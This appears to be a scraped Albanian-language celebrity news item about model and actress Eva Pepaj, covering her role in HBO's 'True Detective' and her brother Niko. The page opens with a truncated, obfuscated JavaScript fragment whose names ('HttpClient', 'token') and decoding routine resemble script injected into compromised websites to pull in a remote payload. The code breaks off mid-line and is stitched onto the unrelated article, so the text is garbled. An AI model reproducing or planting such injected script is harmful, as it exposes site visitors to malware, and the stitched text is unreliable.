;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

EVA PEPAJ, SHQIPTARJA NË ‘TRUE DETECTIVE’

By

Në mesin e shumë shqiptareve që njihen si modele të suksesshme në Shtetet e Bashkuara është edhe Eva Pepaj.

Mirëpo bukuroshja ka vendosur që të mos e kufizojë veten në këtë fushë por paralelisht të provojë edhe kinematografinë.

Eva ka pasur role në filma të ndryshëm që nga viti 2009 por hapin më të rëndësishëm e ka bërë me paraqitjen e saj në episodin e parafundit të serialit popullor ‘True Detective’ që transmetohet në rrjetin televiziv HBO ku shfaqet përkrah Rachel McAdams.

Të kujtojmë se nga familja Pepaj që emigroi në Amerikë gjatë trazirave të vitit 1997, edhe vëllau i modeles është një emër i njohur.

Niko i cili nga mediat amerikane konsiderohet si aktor shumë premtues, ishte figura kryesore në videoklipin e Selena Gomez të titulluar ‘A year without rain’. /Prive.al/

https://instagram.com/p/5aLoB5lKS5/

Artikuj të ngjashëm